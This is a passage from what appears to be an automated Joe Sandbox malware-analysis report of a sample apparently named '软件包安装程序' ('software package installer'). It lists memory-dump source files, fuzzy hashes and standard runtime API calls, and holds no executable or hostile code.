                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ae17103ab74f7c7ba27116ddf20acfa1a33030b9793f89cfab32f42cff4eb5f1
                        • Instruction ID: e207278383b88f62bf7fbcb8ad2e544d8327274476b06b6fad07aacf8f3faff3
                        • Opcode Fuzzy Hash: ae17103ab74f7c7ba27116ddf20acfa1a33030b9793f89cfab32f42cff4eb5f1
                        • Instruction Fuzzy Hash: 8312CE712097818FC718CF28C59466EBBE2FF99344F584A2DE99687F41D731E849CB82
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f4c3878cdf6dda1e5ca36c24f377bc52bcf6993d29949e9196dea34e7f5de905
                        • Instruction ID: 27d62876dc4c70b37343305f880db5366ea4592d94cbb1363930e9137bdee04f
                        • Opcode Fuzzy Hash: f4c3878cdf6dda1e5ca36c24f377bc52bcf6993d29949e9196dea34e7f5de905
                        • Instruction Fuzzy Hash: A9021B31A183518BD329CE28C484279BBF2FBC4365F150B2EE89AD7E54D7789845CB93
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1d22da7b9f01d20fe9c2b0fcfce1f7ad9ec50e907d9644d55dcb606a953bfaed
                        • Instruction ID: c1c0cf1b9c9962521259fc0175aaa332fea3e29f4d386eea9aca179109d073b7
                        • Opcode Fuzzy Hash: 1d22da7b9f01d20fe9c2b0fcfce1f7ad9ec50e907d9644d55dcb606a953bfaed
                        • Instruction Fuzzy Hash: C8F1E1327042C88BEB24CE68E4507EEBBE2FBC5314F544539D989CBB81DB35954AC792
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 37fe9a4fd3af81bafc73f8bd31f63684d8e342a2009f8b6bc144f44596592570
                        • Instruction ID: 06e70fa064f4ab26b10aee230a098d51e528262f9903ff1dd76ed9471221f46c
                        • Opcode Fuzzy Hash: 37fe9a4fd3af81bafc73f8bd31f63684d8e342a2009f8b6bc144f44596592570
                        • Instruction Fuzzy Hash: F1D145715087928FD31ACF2CE494236BBE1FF86304F054ABDD9A68BB8AD734A505CB41
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ae4b2f2b70234ac2bedfdde99fbf7177c16b95a6c2c71cfcccbd0d12063c7eec
                        • Instruction ID: f8566c3c243f19105b40a00891ac95123f65a6e140429061fb0ccd6648087ca5
                        • Opcode Fuzzy Hash: ae4b2f2b70234ac2bedfdde99fbf7177c16b95a6c2c71cfcccbd0d12063c7eec
                        • Instruction Fuzzy Hash: 7EC1B3352087818BD718CE3DE1A0697BBE2EFDA354F148A6DC4CA8BF55DA30A40DCB55
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d6cb5a5b9c3abea019be7d104db6e1742bcc809bf8f8dd5f8f219f0a705516a1
                        • Instruction ID: b357e3d2b8f55c9e1277e6c7a2fae12423986f27ae76de6599afbc76bf77c8cb
                        • Opcode Fuzzy Hash: d6cb5a5b9c3abea019be7d104db6e1742bcc809bf8f8dd5f8f219f0a705516a1
                        • Instruction Fuzzy Hash: 97B1B231304B854BD324EF79C9907EABBE1EF84308F04492DC5AA87B51DF35A909C7A6
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a42b4b82a53dfb7125c27c391958f90512e79f572afba738efee2a2e68b245a2
                        • Instruction ID: de8d16897222dc32c46827f0fdc916f8c68cc410f50527e6b97db0d84d542bf9
                        • Opcode Fuzzy Hash: a42b4b82a53dfb7125c27c391958f90512e79f572afba738efee2a2e68b245a2
                        • Instruction Fuzzy Hash: 1BB19C757047428BC314DF29C8806ABFBE2FFC8304F14892DD49A87715E771A95ACB9A
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 57f28dc9a1232a8c06b083a4d088c40ef3b8ca8235aec33933a76f5351274b3b
                        • Instruction ID: ce53bcafba418c1da706516579d2e845b8c5806590d63eb4a8ef622389457d83
                        • Opcode Fuzzy Hash: 57f28dc9a1232a8c06b083a4d088c40ef3b8ca8235aec33933a76f5351274b3b
                        • Instruction Fuzzy Hash: 71A1C47160C7818FC319CE29C49069BBBE1EFD5308F584A2DE4D6A7B41D7B1E94ACB42
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b96a3bfa2f071fda60c0812de3eea8bd7f1a293af8749856eb5c89b36b6714e8
                        • Instruction ID: a8c0efafc5dee70572c4f028b0346dd03644e7a9a42d74a5420c0677ac8e8cdf
                        • Opcode Fuzzy Hash: b96a3bfa2f071fda60c0812de3eea8bd7f1a293af8749856eb5c89b36b6714e8
                        • Instruction Fuzzy Hash: 5981C335A087418FC320CF29C480656F7E1FF99714F28CA6DC5999BB15E772E946CB81
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e7510d37d1dc4b924ec4f7ba8427fb7a6be5c38a378ebc779dfd7017bf70bacd
                        • Instruction ID: cefcb554217828a52947c351766e1a4443ad67385c0e4820380dbc0c93d34b5d
                        • Opcode Fuzzy Hash: e7510d37d1dc4b924ec4f7ba8427fb7a6be5c38a378ebc779dfd7017bf70bacd
                        • Instruction Fuzzy Hash: D5518D72F006099FDB08CED8D9916ADB7F2EB88308F24816DD111E7781D7749A92CB90
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                        • Instruction ID: 123c5055643bc697f4596204bfec40ac52f04648b3f8c4e2ba43a8f53bead925
                        • Opcode Fuzzy Hash: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                        • Instruction Fuzzy Hash: FF3114677A444107C70CCD3BCE1279F91679BD462AB0ECF396C05EEF55D92CC8524144
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f18cd9d9e139bd055bb212acf8773c3fe54c7ac8df6eb17b1ef3fe2716829738
                        • Instruction ID: 9ba46151d50c488462d2f3dd86bd258e56ad09e6456f70683daa0e05a7619f46
                        • Opcode Fuzzy Hash: f18cd9d9e139bd055bb212acf8773c3fe54c7ac8df6eb17b1ef3fe2716829738
                        • Instruction Fuzzy Hash: 54219077320A0647E74C8A38D93737532D1A705318F98A22DEA6BCE2C2D77AC457C385
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 07ac7ca2a7d87ff4c7dc66bccc711cb0bc82b57c5cf9215ba22a1ab42b21b0b6
                        • Instruction ID: 124347bfd428d1af6b173392a10a121c348be8186040c4d9bc4e49345ca33e80
                        • Opcode Fuzzy Hash: 07ac7ca2a7d87ff4c7dc66bccc711cb0bc82b57c5cf9215ba22a1ab42b21b0b6
                        • Instruction Fuzzy Hash: 68F06572A15224EBCB22CB4DC946B9973BCFB45B65F15009BE541EB640C7B0DD80C7E1
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                        • Instruction ID: 94cc83465abc3f2677d728313cf500df15d640e92fe7a5e48132044849ad02c3
                        • Opcode Fuzzy Hash: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                        • Instruction Fuzzy Hash: BBE08C72A12228EBCB20CBC8CA00D8AB3ECFB84A14B250097B511E3600D270DE44C7E0
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d8b2ce9af6ca23b39d287f27f794cd19cdb7301d321a8ca7d0b17b1edfa8364a
                        • Instruction ID: dea7d5a4ef30c9f9eb59f399b3263700d5234a7b205948bb5b61f8ece4f06127
                        • Opcode Fuzzy Hash: d8b2ce9af6ca23b39d287f27f794cd19cdb7301d321a8ca7d0b17b1edfa8364a
                        • Instruction Fuzzy Hash: 08C080B311810057C302D92594C079AF6637360330F228C2D9051E7E43C314C0644111
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: @$p&L$p&L$p&L$p&L$p&L$p&L$p&L$p&L
                        • API String ID: 3519838083-609671
                        • Opcode ID: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                        • Instruction ID: 5d1f934e6f2aef33fec2fec1ffb772dbc6400228c87c9afc0a87f67c7becc591
                        • Opcode Fuzzy Hash: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                        • Instruction Fuzzy Hash: FFD1B471B04209EFCB05DFA8DA80BEEB7B5FF4530CF244519E055A3A50DB709989CB66
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: __aulldiv$H_prolog
                        • String ID: >WJ$x$x
                        • API String ID: 2300968129-3162267903
                        • Opcode ID: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                        • Instruction ID: ae09c185096d1bd8e5878f9b28530974c2ed5ed8c8e1873ba68ecb4e5af108c4
                        • Opcode Fuzzy Hash: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                        • Instruction Fuzzy Hash: 83125971900259EFDF10CFA8C980AEDBBB9BF48318F24816DE919BB650D7359989CF50
                        APIs
                        • _ValidateLocalCookies.LIBCMT ref: 6CA68927
                        • ___except_validate_context_record.LIBVCRUNTIME ref: 6CA6892F
                        • _ValidateLocalCookies.LIBCMT ref: 6CA689B8
                        • __IsNonwritableInCurrentImage.LIBCMT ref: 6CA689E3
                        • _ValidateLocalCookies.LIBCMT ref: 6CA68A38
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                        • String ID: csm
                        • API String ID: 1170836740-1018135373
                        • Opcode ID: 10f49665c0fbfc781206fccaf57ef758478e3c03634f91e989df473556dae74f
                        • Instruction ID: f1e08c09089d0093895bb87fb6cd2e1a9629150dba0a378cb9b51984e2d3f319
                        • Opcode Fuzzy Hash: 10f49665c0fbfc781206fccaf57ef758478e3c03634f91e989df473556dae74f
                        • Instruction Fuzzy Hash: 5A41E735A012189FCF00CF6AC844ADE7BB9BF4631CF188556DC159BB51D731DA89CB91
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: api-ms-$ext-ms-
                        • API String ID: 0-537541572
                        • Opcode ID: 775ba355e765b04ea21de46941415ac1a25951a3465a9f405693798be2f7f3b6
                        • Instruction ID: 28c01feec9d6cad0a84a575e5eec66f10f65f4a2def3b9e3dd04125e9d016104
                        • Opcode Fuzzy Hash: 775ba355e765b04ea21de46941415ac1a25951a3465a9f405693798be2f7f3b6
                        • Instruction Fuzzy Hash: 3B21D839E05311ABDB31CA69CD4DA5A3778FF027A8F290751ED15AB682EA30DD81C5F0
                        APIs
                        • GetConsoleCP.KERNEL32(?,6CA79EF0,?), ref: 6CA7AD19
                        • __fassign.LIBCMT ref: 6CA7AEF8
                        • __fassign.LIBCMT ref: 6CA7AF15
                        • WriteFile.KERNEL32(?,6CA848D6,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CA7AF5D
                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6CA7AF9D
                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CA7B049
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: FileWrite__fassign$ConsoleErrorLast
                        • String ID:
                        • API String ID: 4031098158-0
                        • Opcode ID: d294b22315d1d7abe380985b6849e571ac1d01bb456f7d29c914fda6198c2ab3
                        • Instruction ID: b9425572c12aaa897f53b7160407649572034339457fb112b9c7438663f066e9
                        • Opcode Fuzzy Hash: d294b22315d1d7abe380985b6849e571ac1d01bb456f7d29c914fda6198c2ab3
                        • Instruction Fuzzy Hash: B1D1BCB5E012589FCF25CFA8C9809EDBBB5BF09314F280169E855EB641D7319D8ACB60
                        APIs
                        • std::_Lockit::_Lockit.LIBCPMT ref: 6C932F95
                        • std::_Lockit::_Lockit.LIBCPMT ref: 6C932FAF
                        • std::_Lockit::~_Lockit.LIBCPMT ref: 6C932FD0
                        • __Getctype.LIBCPMT ref: 6C933084
                        • std::_Facet_Register.LIBCPMT ref: 6C93309C
                        • std::_Lockit::~_Lockit.LIBCPMT ref: 6C9330B7
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                        • String ID:
                        • API String ID: 1102183713-0
                        • Opcode ID: 3c306ab6055b67433ea1432d987404693a0346a2aecf01d3462e4605136cec20
                        • Instruction ID: 1ffb7d5b24cccb8184ac1ff4503fda9a1cc74c4e6344a4519842886a19918078
                        • Opcode Fuzzy Hash: 3c306ab6055b67433ea1432d987404693a0346a2aecf01d3462e4605136cec20
                        • Instruction Fuzzy Hash: 914188B1E00628CFDB04CF96C958BAEBBB4FF54718F044119D859ABB91D734E948CB91
                        APIs
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: __aulldiv$__aullrem
                        • String ID:
                        • API String ID: 2022606265-0
                        • Opcode ID: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                        • Instruction ID: af58dfe1eb9dd22ef1d503fdbd1455b26fa18dcaa43fe67f172d0b8ba4cf69c7
                        • Opcode Fuzzy Hash: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                        • Instruction Fuzzy Hash: 57210330502669BBDF108EDACC40DDF7E6DEB417A8F208225B52463690D2718D95C7A0
                        APIs
                        • __EH_prolog.LIBCMT ref: 6CAA86F1
                          • Part of subcall function 6CAB7173: __EH_prolog.LIBCMT ref: 6CAB7178
                        • __EH_prolog.LIBCMT ref: 6CAA88F9
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA96000, based on PE: true
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: IJ$WIJ$J
                        • API String ID: 3519838083-740443243
                        • Opcode ID: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                        • Instruction ID: cc7c3d156bdb889cf7b86836bf6b951c54831e5ba12f77e564327eadbae49892
                        • Opcode Fuzzy Hash: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                        • Instruction Fuzzy Hash: 2671B230900694DFDB18DFA4C544BEDB7F0BF18308F1484AAD8596BB91DB74AA8DCB91
                        APIs
                        • _free.LIBCMT ref: 6CA848FD
                        • _free.LIBCMT ref: 6CA84926
                        • SetEndOfFile.KERNEL32(00000000,6CA8350C,00000000,6CA79EF0,?,?,?,?,?,?,?,6CA8350C,6CA79EF0,00000000), ref: 6CA84958
